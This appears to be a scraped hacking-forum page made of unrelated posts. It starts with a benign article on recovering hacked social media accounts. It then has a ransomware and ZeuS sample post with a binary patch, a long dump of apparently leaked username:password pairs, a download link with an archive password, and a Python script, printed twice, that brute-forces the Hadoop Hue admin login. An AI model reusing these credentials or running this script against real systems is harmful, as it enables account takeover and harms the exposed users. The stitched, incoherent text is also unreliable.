Search the Community

Social media platforms provide fertile ground for communication without borders, so there is actually no limitation as to the potential benefits that these platforms can offer to you. This is why so many Internet users have been registering for new accounts on Facebook, Twitter, Pinterest and Google+ on a daily basis, opening just another window of communication and online interaction with friends, relatives or even mere acquaintances and total strangers. Most people own more than a couple of accounts on social media sites and use them fairly regular (even every day, as we have mentioned above). They connect with others and share personal information, videos and pictures of them and their loved ones. They also share their thoughts and anything else worthy of attention. Due to the significant increase in the social media accounts and their gravity, there have been major incidents of hacking. This means that many social media accounts get hacked, and this is not a rare phenomenon to comment on. On the contrary, many people have to confront with such a negative consequence of the importance of social media nowadays; social media is an easy and simple way for hackers and other malicious intruders to have their way and penetrate the systems of many other people (the followers of the person whose account has been breached) at once. Let’s start by looking into the signs that reveal the hacking, in order for you to be on alert and know when something is wrong with your account. Signs of a Hacked Social Media Account Although it can be difficult to realize that your social media account has been compromised, there are definitely signs that should raise an eyebrow and motivate you to look deeper into the root of the problem. Some of the most frequent signs that reveal something is not great about your account include the following: You instantly observe likes and follows that you had nothing to do with You have your status updated, although you have not shared anything There is ad flood on your page (unusually extensive) You have trouble logging in Private messages are posted on your behalf Spam posts are posted on your behalf You have new friends that you do not recall adding Others inform you of sharing malicious content on your wall If you notice some of these signs, you had better check it out and not sit idly. It is more than likely that your account has been hacked and you need to act promptly and effectively. How do accounts get hacked? In order for you to know how to be safe on social media, you need to know where the threat lies. Indeed, hacking a social media account is a lot easier and simpler than you would have expected it to be. There are sophisticated menaces nowadays lurking in the dark and targeting Internet users, so as to penetrate their system and access their sensitive data. These are the major methods for hacking a social media account being used by cybercriminals: Password exposed Phishing Malware installed Sites being hacked Third-party apps or services breached As you can see, there are multiple routes to getting the desired effect and it is true that today the threats that appear online are far more advanced and sophisticated than a few years ago. So, your defensive line should be equally strong. Below, we are going to have a look at what you need to do if your social media account gets hacked. What to do if your social media account has been hacked Even if hacking has occurred, you should not panic. There are several steps that you can take in order for you terminate the threat and reset the protection layering on your computer. Just follow the guidelines being provided below in avoidance of any further damage. With dedicated work and attention, you will be able to regain your social media account and have nobody else threatening its integrity and uniqueness. Of course it is crucial that you change your password immediately and that you use a solid password that has never been used by you anywhere else. The common strategy of using the same password on all of your accounts (email, banking accounts and social media platforms) can be catastrophic! Delete the apps that appear on your social media account and that you know nothing about. If you have not installed anything, you do not need it on your account. Equally important for safe social media is to set the default email address of your accounts and check that it is available for you to reach. Make sure that your antivirus is up-to-date and schedule a thorough scan for any threats on your computer. If you use social media on multiple devices, have them all scanned. Report spam posts, as they can hide malware and other threats. If a friend of yours clicks on them he might get in trouble and have his account hacked, too. You cannot allow this vicious circle to go on indefinitely. Think twice before clicking on anything. New malware can crawl up to your account and therefore you need to be vigilant and eliminate such threats. Use secure platforms for paid messaging. It is imperative that you buy the ads that you want right from the platform and not have a third-party getting in the way. Last but not least, make sure that the online information of yours is safe. Do not reveal information that is linked to your account and do not expose too many details from your personal life online. How to prevent hacking on social media We have already outlined what needs to be done after having realized that your social media account has been breached. Nevertheless, it is essential that you know what you ought to do, in avoidance of repeating the same mistakes. You ought to enhance your security layering and allow nothing to penetrate the safety of your online navigation. There are some fundamental details that will make a huge difference for you, and that will offer great power and effectiveness against malware and other threats. First of all, you need to be cautious with your password. Besides choosing to use a solid password that is hard to guess, you need to be really scholastic about others knowing. Even if you use social media at work, you cannot risk having the password of yours in use when leaving your office. Always log out and be twice as scholastic with shared computers. Do not share your password with others, even with your best friend or your better half. This is private for a reason and you should never underestimate the risk that you take when letting someone else know your private information. Apart from that, you ought to introduce yourself to two-factor authentication. This is an extra weapon that you can use to enhance the protection offered to you via your password. With two-factor authentication, you eliminate the threat of someone else breaching your social media account (or any other account, apparently). There is another step that has to be followed and another piece of information for someone else to breach, prior to gaining access to your social media account. So, this is a great weapon that can be put into effect and act like an armor for you online. Bottom line Safer social media can be really hard to achieve, however, if you are concentrated on what you do and if you focus on the guidelines that we have provided, you will see that you can recover from a potential hacking of your social account without any delay or frustration. Of course, you can follow these simple guidelines even if you haven’t been hacked – prevention is better than the cure, right? Feel free to enhance your social media account protection right away. This will keep all dangers at bay and shield you against the malicious intent of others on the web. Remember that social media platforms can be truly helpful, provided that you know how to use them and what safety precautions you ought to take. Source

Generic ransomware pushed to small ZeuS botnet machines by script: user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe) zeus script.png (835.88 KiB) Viewed 115 times ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX) 6ec6069728a91a04407283bc6bf208b7 UNPACKED Some generic ransomware junk..run in VM it asks for a password to decrypt files so I thought I would try to crack. winxp.png (590.39 KiB) Viewed 115 times I'm not a great RE like most ppl on here so I gave up and just patched the binary Change 00401C19 > JMP 0040124F (decryption routine) Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out. Download Source

Sa va ajunga ! Spor la treaba! PS: Lasati macar un like daca v-a fost de folos! teqiladawn - sandradoyle rowme - rowmed nomin - 130376 bumpower6 - threetwoone scottaztec - rice10sd twill438 - outlaw nivag18 - buttons wdubdubw - elubbort cesspp22 - carla123 il2fw2 - fuckme2 Raptor84 - melissa fafijhe236 - siigp86 redshoe21 - timber21 joevitale - letsplay whitney - school andye25 - snatch bigalajuk - bcfc1875 jufahg - gurus1 cammibulin - goalie bastou27 - bastien8 rainxxer23 - Putxzis beerwrench - dillon01 karpsia - aw96b6 aone114 - 47ajax47 hogomji929 - woahp21 wildschwein - chester dayalan3 - naidoo jimeldo899 - xiivr43 sunset10 - birdie kenefte125 - jioyy98 kenesqo973 - luodx96 MadMax6580 - TyroneP2 Addans - Noumea andy666666 - lau7777777 yiqulv589 - Computer21 bcup1969 - lunaisaac muggbb47 - mellaycf72 bbz473 - seisc74 Branman80 - peachs80 jimmy534 - hellobob jd0015 - lompoc coletrain8 - mu2197 holb8321 - hol8321 Justinpants21 - truck11 lorenalex - advantage g2xwb55 - z5tiw2 wmario - xmrwar hamsterjovial - matuvu mindforce82 - xaper2 kosanjou - 1jousei djsteveyg - cantona 1blackguy757 - cmsmg303 fjbjr3747 - kat3747 bambo911 - mambo119 guiltymark - guilty789 jakuvx118 - xiuzr85 geregk995 - siudk13 30relovefd - grassydub20 32siol - yaird76 bry25mm - b012963 15indent - dosage47 12florist - woumk36 andsch - andsch11 Dokkalfar - Unicorn1 petrus58 - dziadek9 bigry17116 - rsh1016 rudy1484 - thetaxi arthurr5 - 586237 bunkie33 - chocolate beandoc9 - godzilla stravnicek - Fairlane yeraxne253 - fiofc66 pampette - 271062 kingnan - fox123 chuch1 - chuch12 kmb420 - black711 gksloth152 - riohondo1 bishe123 - sadiecha rhino1fan - a377816 corpluna - lunacorp yvonnetv - rebew000 gsaliba89 - Gera1983 cgpi392 - giokf82 rmkoch - poohbear x072961 - 554xsv bconner - brittany papi9051000 - l6531981 quping889 - xaacs81 Chijio - london22 bobneomo - polarbe loehne - held2076 deaded - maximas tednet - matrix SD6000 - Brumme d2xcBC - ZqLh9w fwwill - fww72mhg djr101010 - 99717777 ndixon11 - nad911 82liquid - 3thyself jerome2001 - jerome2001 seadevil - ostsee klaypantera - 5fiths Cantav71 - Flyguy kktula77 - W8NWEZ22 ziko21 - 21ziko khatch914 - hinojoza dpa911 - dpa9011 miltsumm - crawford john5527 - cav2000 dpw2feap - rvq97ac apollo007 - tiger6 sarge11c - tralee31 jonride - toomuchx saopaulofc - saopaulofc paettes - 300464 Teddy78 - devonas polo26 - frenchie equatis989 - thatcher Thor116 - ako2009 smaillot - melissa teenteen - salvador mysterio - kingpin micke85 - hulken85 bill416 - mom416 popaloo - spikes jsvinson90 - havetha 18ghurryodd - garsegef13 nickskol69 - wingman heavytree - smakhead jdrum1969 - dude17 testlich - Logitech glucarini - 12101492 plutopus66 - puspluto66 sidler - 46173167 flexy69 - techniker visual11 - coax74 schillzy2 - pooka2182 theand1 - thebandand1 texmex1970 - armansolo tf7v9aqysn - t6yisnc jcogaston - jcomapuc sittinduck - ducksoup 321123 - 123321 Herbert9 - p12ussy ccy345 - coofr82 wazman - fruitbat 789789 - 123123 Kensho - Harado artdog - luvweed Jose71483 - monzon83 98trim - forays74 rpdiddy11 - guanbu Posa2486 - vollman hotguy79 - daniel79 Jason23h - kenya23 heymoe64 - dragon88 insydney - orion111 k0220khk - k0220kkk crimepad - vitamini capfininv - harvard dergute - bettchen pgbinkey - yourname zhanee - zhuang schnight - domark leijten - machine joseph1111 - friday1111 ahum19 - frozen34 xeth666 - cyanide winiaw1 - spazz100 govuzri234 - liuhn86 TROJAN55 - SPIELB wittcam - DCIII1 shashidc - devi1210 joporn - jetaimmme mahalex - 141292 dorlesky - Totalfx cfrezksa - Girls4Me rosspsp - ross21 marc092801 - tony17924 gmoore01 - hughjass pokkori - swallows robepat - mb1264 mvl9924a - rap9912a pin6660 - 61845073 commeres - martinet jackstraw22 - mets1967 Eielsen - marianne fabilarage - larage alques - judit67 alan1988 - denvermelo eaglesfaninmd - philip89 pimpsa - prjn6kv2 r27wagnr - Windsor nooshabe - 123456789 sorrycharlie3 - abacab sstapleman - eskimo caowd89 - bouty67 rechsta - blabla0 mbeachsc - southc xhead00 - 013971 lesleyjoyner91 - washington woeful18 - gainly80 oossie59 - shalom Tarakun3 - 1madkat kkybeast - trombone dergesse - dgesse btsten - 62413242 dogcat - catdog wade2006 - wade2007 drufuss - gosaints1 dreck45 - gundam n1smith - allover1 patrixia - pattinaa royi90 - vikingfk angelina - dunwoody Pisolo - Pisolo74 abazzant - 1nigeria cheo2710 - jclh2710 qballs56 - 5642qt two1sixsoldier - mushroomhead hypmacy - super40 masanf - auhieb jackarow - sonoma ponger - pingpong Manweapon - atomic13 kevcogator - caleb1 coahicw6458 - daogekz1713 narvik - woodelf vask67 - 1967Yegh Bigturk23 - 06195885 bigdaded - daddyo logitech48 - casio48 fuhikvo555 - tuaty45 sadams67 - byteme67 spreadmo - hiang50 jms4444 - jelmer tkoownsu - buffalo zcyzj913 - jssei312 duma23 - abc123 JNB013 - santiago rogersn9 - slick9 Vapido - raygun lourock21 - pr1030 zzzra123 - pansay kohaly716 - 6N9KFP99 kofewyu534 - piihm12 jacoma - fsujag mrv576 - zhonda4 monddogg - kadeem gyoyicd6864 - niodaqg5579 tschato - winter nperdomo - 277272 jbergman - bergman jmf959 - ttu1989 egnerch - sulzberg DKloss - Ekonid k11971 - polo666 nafrayou - theboule kwelch4 - lindros Chris1825 - 97laredo mordzeis - 181944 erminio1 - ottone11 bobcos - ocbob1 Wallflower - Springsteen Jeffnesbi - jnesbi boboashant - brandon 47tsked - elopes56 rpdavic - anna1982 Raymond2012 - 3440172 john701 - alexsilva EY2112 - stunner 0614610 - 163435 dearyboy - nike6453 goshiru - blackman melon1 - norcross1 creedrulz - wedgwood Wanna777 - Wanna999 rflores - bflores ottombre - 100222 boomer27 - petree michaelhuber3883 - spence Bartoli - laracroft popmix - 12301230 jumpy123 - river123 vmkjimbo - password blackbeard84 - ashley opie1104 - golfpro1 superwarre - superjoppe yoshiji - yoshiji7 tonyg88 - f24pwwum adamilka - allstar1 harley - davidson evoevo - abbeyford tonybacker - t150376b crazycat5782 - drzoom vash831 - wolfwood tozoyga781 - hiiky53 tastyledong - andrew40 kegels - qweasd stiffrod - 365dagen prnerd - bebe17 capshook - katiep35 qqqqqqqqqq - wwwwwwwwww hazels - exelent cfrezksa - Girls4Me arty2006 - lantekis jimgoodale - bronco jbmravens - tooter schroelj - pass6050 joratpu293 - raufs35 toyo5720 - toyotamr mthdmn00 - gn6008 bhill2 - 5calli tyjnsn - budee5 dedmonds93 - valencia rppdfire - boogie harib555 - 33hk5d6x messward - builder dave7927 - mabel1 volterol - gratis scottii - ryannn schillzy2 - pooka2182 Cadaviss - Jlindler batman21dd - rayne21 woody2k1 - sivart69 macj415 - felix1 sviper313 - titans ddj774 - yeips48 weekdg91 - bearerfaf44 Ethrv78 - volkman78 brucek244 - 12093bkz boramy - elsaco lescom - golf72 Peamapb - mayhem glibly6 - hobnail1 blackeh - dragon33 DtownM - Mabery ttayea - tarik1970 bhempen - hemp6061 uptown820 - 314567 sehiln31 - 2G3G42DS msbusmcr - 03315711 u47qbvd4iu - ng6a3nuf94 tiger68 - slick68 alexguiney - vineyard irdaze - lifted titosca - victor mj124ca - hello76 plaz26 - marcv26 vekum8888 - vekum9999 darren1 - sasha1 Capone08 - 072582 chrisroberts - bernhard thaQuiet1 - 5avag3 dannn88 - goodporn braddny - cabin18 heymoe64 - dragon88 cesareo71 - abigail21 bhphoto - redfish golssc - gotrojans boggle22 - toggle22 pendaman - ruaneag1e speer77 - totaldeath nfs2782 - redsox hate215 - naimah19 kubach - conrad kmosesltd - inquisitor impala6 - bigduke6 frankecovall - coboler5 swappy123 - ballball jrusso - newmets oussama - 369272 iowadave - sierra10 beerwrench - dillon01 bsmassey - birddog wahidir - Pakistan redjam - oxford dadwag - 1qaz2wsx jh251977 - jan2525 d89fred - toledo89 brianick - v1ctory tphiggi1 - 81238123 jsp19773 - 98catera aporrera - 270971 bobdonal - 22446688 transfo83 - 322350 hastingssi - bexhill leighwx1 - garrett andres321 - sawand22 droop132 - buckeyes mryan49 - football1 mugarby - multimedia apester110 - liGht1 blue8229 - bluegpc packers - greenbay rndmtrvlr - catshark toejam - beemer jfreshh23 - jumpman23 hrtmeplty - suzieq99 flow69 - bullet kingdawg - rush2112 csterlx3 - csmxxx3 zooner43 - rvk439rk xxx2000 - noidea baches - devildog denden12 - denis123 ohoopee - oconee Kramer3980 - Cartman22 SGTD666 - pscxyjr1 edub23 - 052378 oova92 - zedle1 haggjan - jh2004 redwing86 - tinman DALE1234 - PENNY12 caa0288 - leon5485 lgarciaf16 - superman1 imca17 - modified hondo777 - mario777 yerkees01 - joanne10 blemak - kenaidog Password1 - password psienk - hgwolf jdlabadie - louie123 morace528 - hemi528 fastass69 - banshee triplex1 - tr7288sb mcintosh49 - michael9781 joninrn - kareena thepes1 - wespot dano727 - eddie7 tiesto79 - tiesto sidibouboy - charlema sumrfun - david28 tomduk - jennifer fatleon - coochie dale1984 - hendrix tassek - fuck18 vaughn22007 - jkelly kwelch4 - lindros adiianni - Nessus09 cramos - sasha15 imhorny - iamhorny option626 - booya1647 andy102284 - edksgd09 onetroubledguy - dodgeviper merch1 - merch12 quinton1 - nud3009 dilse82 - yesboss jffzill - restle7 maschi - rocketmail bigdaded - daddyo mulla84 - baron06 jonride - toomuchx yort007 - hooper debandt - emmerin gragland - ragshit bradmcra - rallycar goodarzy - internet dtmauney - mongoose miks101 - h717suww ph33rz - johns8685 juve10us - turins igtits - Breasts jatomel - surfer caneyo - hermano4 kbii9uzibh - c3jtbzizmi beetup - beetdown Mrblkmonster - Antman RROPPMD - SANDMAN ltgreg23 - ansel204 campacola - coolboss rinoe6 - e72008 emamitom - schuanke bobdenar - grtyui00 smuggs - vermont rlamy01 - spt111 wenzel49 - jones1 wes5525 - cece5525 linewatch - pattaya85 mike4025 - shisnit1 souffle46 - 1nursery danlude - shania Steve619m - marine gmanbman - goldman bird36 - birdhugo dmarty23 - danman12 beandoc9 - godzilla wtranger72 - wraith72 lildrum - hilfiger abarron - flametop royal12 - cvca1216 engineer63 - airborne Compu73 - Zonai55 bigawa20 - k0552s tallguy - 25521tg ohh213 - int456 clusseau - hgslion hedinwo626 - fuofs12 drshoe1 - sophie2 alpha123 - bravo123 aklee091 - azn648309 mavdog - baildog kayahead - booyeah gitaqd35 - hupolv82 ramacke - cigarbox budsi853 - meubd44 dmusicman - bigboy toph22 - simple22 thecle - 7694mich alex89renaud - master89 marc6998 - skb670 cromejob - sithlord23 Sahfire - 30567x miescobedo - 82428242 bozoxx - sepiaxx jjones01 - jjones02 kingmidas - optik13 cmander25 - holt45 spientje - proximus dha1122 - pktmuf1r dav333 - pressed majormanis - travis76 daymen - maricopa gotenks666 - rapsucks sweetpea1 - sweetpea puyijya172 - qaigr29 repins69 - cavair69 winter2 - golf10 vernon213 - comcast reaperj13 - jets99 jcbarker - jcb7516 giliwn66 - pukadz74 kirneh - henning njbring - guiness whodaman21 - isaboo Gigageil - Jeronimo dddjjj99 - mollie99 ighosh2 - monu69 sietze - sgjkjksg cadillack4 - potato joe93941 - dragon brewer3 - brewer foxninja - mancow fallowhal - joamam jays694 - stephie1 teecd87 - haasf21 dlouc1 - waqlgg csteen13 - lingbear fiend78 - fraggle redwing18 - 97isbest dcqo623 - huelp62 ggrruumm - pprrooww trevorh - wombat1 folgore1 - avio11 crankyasianman - babewatch bj8712 - maverick87 irish4224 - football skifag - fagski yungsizz - boggie32 scrubdug - 200sxser blanther - 220644 meijiro - akahei jasonr - powell keith316 - austin mottkmk - kendra909 jimosme777 - vouzm59 chad516 - iverson vtr996 - superhawk sadams667 - byteme667 bjy454 - dingo111 dave2923 - dave6488 ptconnell - salswest biggwheel - roxwheel cdxi953 - ziihv62 jut138 - tyler138 ejyjets - yogstert Sc0ttie35 - 21winks12 bussipaolo - paolobussi Pike112359 - fht77511 smokey24x - momo2424 tcl611 - 611tcl DRYDOCK - BILGERAT geerod - N0Aces2Ne1 cbr600 - 240sx macdaddi - quazar wabbit - shithead amblaze - blakout3 nawlej - superman kdragon1 - kl9510 jeepjr3 - thumper Desire21sml - Desire21 del6574 - 65746574 oozecana - sheecowy SD6000 - Brumme eshenk - 5150bro devilred - juju12 cptmorgandoc - mazzie666 muggbb47 - mellaycf72 schet989 - oad200 jpupu89 - 18245190 catf250 - sweets mmurph34 - chet34 smitty555 - 050505 decate - calide lewy777 - homer1 dukefan1985 - dukefan mathil - camaro lawler1 - aaaaaaaa nonobad - shazam fraterbass - pinder2468 wizard24 - cleric1 rashash31 - oozbach31 genestyler - jarkeld rac312x - 1abyafyh nate2525 - ligers25 sengupta - 195013 quietguy - belleami crazychris - chrisaodd uekab123 - jk291184 datatt844 - xuibv93 royi90 - vikingfk nspidz - frederick25 bootyagent09 - allornone jck17444 - thisfuck21 yelrut - 183417 Colbs1 - camellights logannu - ogallala strive1 - 57plush iwanna - fuckamy fireguy349 - eastmans1 aphilipson - 93562923 chief02 - rkdx03b code2000 - travel bentham - coinco02 nabinader - iamsad wizard3 - rosebud groola - sapper qqaazz - 1q1q1q ericvk - evkt9966 zenpmd - sweatbah1 OtisNYC - value1 jvek8604 - july22 cambird0 - flamingo floritejoe - wawawa1 grottem - charkim aj2234 - videos bob1803 - zoey1803 saland75 - control logset5f - logset8h telltell - aaaaaa jdworks - 48684868 mchan15 - jordan billyg - bgbgbg JayBird311 - nofate abadi1713 - 038991713 jcross45 - 5ummer marty26 - nissan SuperDDS - planey69 rekenaro - cami1020 prankstr01 - k11788 fafijhe236 - siigp86 gerfuhs - catstone goldsaad - 415321 delft80 - C6ah3c7Q coxman - 315315 yudafhe681 - teelc11 bubear09 - baseball darkx3 - maverick Thatone - Oneeight butt25896 - butt9998 rdubes8 - ijt7bu5y lazyin18 - superman18 leone52 - poci4712 wharfrat65 - komets1 safarisam - zodiak fouiny788 - 12661266 sphincto - tremadoc pretzelz - dangnabit pimpee22 - 179533 L4wm5Z3A - CFe39V7d friedmak - lugnut15 sonics1 - dawgs1 Sebastion - eatmenow hisandy - bysammy bluewill - casper12 car7316 - dezar66 uffda32 - maudesta acidus - josilein mcavaleri - youngmoney gomencha - 050477 solidmarc111 - solid1 bjhack - aj07ja yessoacd77 - loredcog81 wildschwein - chester lucascourt - turlock cwgexpress1 - airborn1 vzm00701 - bun18263 oski94 - 40521x vgl5858 - 585858 lincolnjd1 - jennbaby1 wert007 - sk061182 mr2bl326 - mr23sgte jerry3232 - cac1us frunhefo - Blink182 sli399 - wrenu6 vicfuk - kurgon mikey666 - scumfuck zilecz795 - LYWMB5FT hartivi - zucker quiff1 - bezxsw11 mattcav - mjcmjc dfruso - echobch steelmm - melanie10 bannwest - western1 spurspeter - spurs78 jshatara - 9757953 Insane0330 - Insane30 rpdavic - anna1982 lucascou - turlock Kedbuka - 9thdegree cramiam - 7574646 nanard - bdsdesi claymore87 - shaadb allan - allan polly - cracker vanrenen - spectre efef7226 - 191172 Longdong - longdong xtc4ever - alexis yatayata - angel666 sigchuck - sigma1 batman52 - sissy52 rrankin - bigdick obelix21 - milano21 cykelsmolf - mkk1391 robbailey1 - fighter1 NaughtyOfficer - notieney87 osmellyanus - 020704 limixcu376 - yoegh58 jiggle - gallus pgunawar07 - 07172119 jotajl986 - nuoln41 ddemefq1366 - zueyeqk2944 hazrulhafiz - tarabas sdphj024 - sadie124 Patronius - tzeench5 hunghard - fullload ervinmagic - vag1inal djr101010 - 99717777 OAKLAND - RAIDERS chuiee - maxmax cannter - hohoho btrulez - qwerty naes231 - tab125 candles - zoxyrfta thorze - east434 p0glet - ph03nix gnzupfer - nicholas RBB1981 - hevdab25 nicepoch44 - nictest44 bclavet - bc3611 bgyula - bgy1961 treball - ballin sickness72 - dexter1 uncletricky - 257200 sekula20 - kennybob69 sokker2102 - sokker fythesg - knicks jgord17 - postflag brodie81888 - puffdra6 EricVK - evkt9966 horseym - casey07 hamare - mhhrha Sirserge - solskjaer rlthing - eidekoms ffj453 - xiovp78 craneman - 032256 sandman89 - autopsy89 erlsug59 - sugerl59 samtherock - saml2222 pesk01 - pesk02 kakusgu448 - vuetr69 abbish - drabbish bossmt_2 - bossss nils4321 - kira1976 pjpjr70 - corvette jokoby788 - liifx52 favazy27 - xikefj92 tony434 - marino cclifton - eagles mals07 - 6402btt ryanf4f2 - tippmann fausebk6896 - ceuzubl8561 janmomo - Luzi2005 solaran - errant curt88 - djarrett buckyosu - norka aspeace - qwertyu8 yogamark - ferndog8 bobdongen - kompasje2620 stlboi - asshole shornbird7 - seven7 DELL619 - TUSHY4ME WildPontiacKat - me6569 chong0 - lolazo ehrjnxt04 - dqqcy991 pavell - hydra65 djsteveyg - cantona towecru365 - ceimh83 eaglezor - crystal erinlee - williams foster2069 - 046744332Rob fred333 - AYAYAYa dcthompson89 - cstrike89 md5032 - ffv42tzz wrestlin - bischoff angrypirate - mrsmith3 ihanordt - bobb557 treesix - tree8073 love123 - hate123 saibaba99 - 369369 zorrro - barney Housefred - Onrop1 apexiex - leilamay fche937 - fuuxt77 leftfred - lababe clgvnxm975 - qdlwcc72 doobur - pirates amckay1932 - dragon98 cvrs15 - 121570 brownsuga3113 - fritz311 mattmcin10 - mikaela1 ppolizzi - 325442 semperfi - devildog knappy5 - erk0245 rake5757 - 72thinline shinlith - 2peaches2 ffv838 - goejd59 sekoms - mytits courterin - erin1979 definochris - defino76 kuyixze219 - jeoqy31 djhotnics5 - beefnutz shamrock2624 - garcia brybonus - stores tabatha - cash73 lilernie - walter cmm2ski - snuggles saruhan - gapuso topolsky - bdylan az1za - Walker44 luvanda45 - ass12man alexnjbmx - buster01 sum1b4 - a122122 johnsy021 - crf450 SamsBro42 - Lois1999 mrjonze55 - mrgreen5 dannyd2130 - sophia21 bremen - werder wnstardis - master hangevine - ha879862 mprasmo - ellabean mentallow - chris1976 nag11nag - jo1jo1 Michael64 - malambo peterp25 - 1832kwnh bigtrak - vertex rogergibs - redjet keiserberg - 50061017 marc2086 - marc12 tsoc88 - lime3978 wibihpu331 - yoiwk46 corvettte - ferrari teakygod - encrypted marakesh - giacomo randygg - genegardiner Traktor51 - Fendt312 javier115 - restrict Djemell - 12guts DaddyLA - jenny69 dethknight - timmy1 Zackarias - Mustafa pwidmark - thomas11 jcaddy - bigpimp PSinger - singer11 greyben - mooney olamm123 - Kettwig sert5343 - chente preset8 - 1whirl jack2552 - TreeTree bazzer01 - angler01 denham67 - edward01 schars - jedi86 YvonneTV - rebew000 jarvisd - jarvis fastrak - 400mod parteed1 - golf18 sack316 - jmolden andygje - andreasg astorelli - rome1973 mario4203 - 7856bm42 yourcraz - 26012601 passme - viper1 spike138 - sammy123 elchivo430 - 197230 mubeat - m12b12 vucowge378 - jeirp32 cliff71 - janace gscotty311 - incubus username007 - password rawness81 - mucous2 glucarini - 12101492 elesity - elisity nzstump - gse1492 indiano - coltotem gmooney76 - 2011camaro paladieu - chantal arthurr5 - 586237 plumber91 - parka89 sunny2109 - candys21 zteam21 - Zassword1 seanmc40 - natalie69 xijavmu792 - zaiyd49 rootness - Mcaolm528 sworth1234 - tennis12 Tony7740 - lamont shifty0420 - doyle0420 jgriffin002 - pa55word ojnajd - oren350 arriber - gvau574 geutjhik - zul6191 mode112 - fabulous fostoq - bigmoe bigearl - bigtime parap50 - 17giugno pjohnson70 - zachary12 edbird - bsaeagle gospel1 - 52cutoff blackcavy98 - dirtjump Foucault - prisons ggnshade - sam58177 ufcy912 - qeegz845 sopaw10 - 37option wazz237 - tupac237 piocv42 - feuzx96 disappearingone - 0220Smith manvessel - bankai. ClubMikeK - notrust chrisbeil3 - 010101 bozedwrd - daren1 itoner - mujibur richmarr - somerset tecton - rop890 sebabugn - jiraisvoir Grafmsk - afruhfarjhg bigz8525 - ramboo11 cps112 - sondheim caowd89 - bouty67 Edvardodc - jebyebye xhead00 - 013971 knicks85 - knicks wichmix - klopppp4 danicon - dan4160 ski3124 - tools1 GymmyCee - bitburger ThanatosP - B5372VF8 peter411 - metswin danaa31 - voxprom2 amigo79 - solomio Enigmahfc - hellfire jimmy72jay - cat123 warily7 - clause1 w2mdepzev2 - mdc4b ramiropang - orlandopang yeraxne253 - fiofc66 okedoke - ohboyy stiles29 - cwcs0798 jbon27 - jmjz2728 b4sketball - basketball audiexpress - audiexpress1 dtex123 - twiggy gndark - asfoor kod180 - 91240sx whorl3 - hades5 freshie24 - dilL9boo idd0002 - tyson007 dumbocondo33 - 90dc80 waltg195 - Grw082585 Parislj - 041980 palladin2 - Palladin tatenm156 - winston1 ehmehh - ehmehh90210 mcm206 - baseball nsr5001 - themill1 ereichen - russians brickdpm - heather dakocta374 - yuitp26 deno1977 - uptown77 cw6042 - knights07 dger01 - 578081 fast20 - number20 yafitni977 - liulh94 tyler895 - 305408 avamon - vomolo fengerman - 360king eddy755 - 100371 deaded - maximas maturefan - mature jpxsjpxs - azsxdc tamtheman - rangers ROSSETTI - ASQVEAE sanjivs - u82769783 sachac - dinnas dstafford40 - uncalweed40 astahl - qwerty yasu3030 - aki0919 mrbrian75 - jordan05 benjie1991 - westham conjah04 - yumi12 mariusza3t - matrix bigry17116 - rsh1016 enochelo - airearth DBoyShzaam - cherry11 petlin101 - petlin monkey9589 - tinker3 SpartanRonin - capforce2 fredexfoot - 134679258 Drusapp - holla234 devink - 432252 tateran - busted scorpium - moog1980 schurmann - 82038665 tsubo - tsubo7 beau97757920 - gandhi909 benjis - bootneck curtneilc - crjc14 CISCO88818 - Scrabble blaster110 - eodf325 thresh10 - nammy10 dalguy - hiroaki1 jeckmann - jncojnco retz33 - homer44 rrprrp - mackay insydney - orion111 sfirster - cutrina jaws86 - pontiac fawevt22 - zoviyq56 pulpcash - maulfogo ty0628 - topgun Kparksmonty - Scully pmspac - heed1980 cockring - greencard larrys1050 - transit cheffone - bo300459 tiffan88 - gooobis88 melroseg - gomluv69 kold594 - allygirl greatestss - bigbigbig1 warmus - johanw02 bifidus - 414741 rodennis - tracy287 johndownlo - mocha4 grmchjb - 7avx7kj ced2282 - Rookie06 dbeigie - db031163 yenospu622 - qioyd37 zuhier82 - 198215 beandyp - butthead thufir11 - avalon11 emikals - a53s07k danmaster - esparta

scan:Fucking Scan Me! - Results download:https://www.sendspace.com/file/q9qlpx password : RAR SIMPLE SYGGGGGY

Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source

Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/pythonimport sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source

